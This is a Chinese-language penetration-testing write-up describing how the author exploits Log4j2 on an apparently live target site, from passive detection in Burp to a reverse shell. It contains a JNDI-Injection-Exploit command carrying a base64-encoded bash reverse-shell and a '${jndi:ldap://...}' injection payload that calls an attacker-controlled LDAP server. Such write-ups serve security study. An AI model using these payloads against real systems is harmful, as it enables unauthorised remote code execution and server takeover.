Log4j2 漏洞實戰案例

在現在以及未來的一段時間里，Log4j2 漏洞依然是滲透和排查的重點。在測試靶場里復現多次，在實戰中遇到還是十分興奮，So，總得記錄點什么吧。

01、漏洞發現

通過burp插件的方式，將Log4j2漏洞檢測能力集成到burp進行被動掃描。在訪問網站抓包的過程中，檢測到目標站點存在Log4j2 RCE漏洞。

02、確認漏洞參數

由于使用參數Fuzz，每個數據包里都夾帶多個參數注入Payload，我們需要進一步定位到具體的漏洞參數位置。

（1）登錄ceye.io，可以查看當前的dnslog。

（2）對比burp參數注入的payload和dnslog請求，可初步確認參數username存在Log4j2 RCE漏洞。

03、構建ldap服務

通過JNDI注入利用的工具，構建好惡意類地址和ldap服務，為進一步漏洞利用做好準備。

（1）構建payload，將要執行的命令進行base64編碼，可通過Java Runtime 配合 bash 編碼實現。

在線編碼地址:

https://www.jackson-t.ca/runtime-exec-payloads.html

（2）用JNDIExploit啟動一個ldap的服務。

命令如下：

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "編碼后的bash反彈shell命令" -A “監聽的IP地址”

04、獲取目標權限

利用Log4j2漏洞向目標服務器發送構造的payload語句，反彈shell，從而獲取目標服務器權限。

（1）啟動端口監聽

（2）在burp進行構造payload，url編碼后發送請求。

Payload：

?username=${jndi:ldap://xxx.xxx.xxx.xxx:1389/pgc2pp}

（3）服務端成功接收到bash反彈的shell。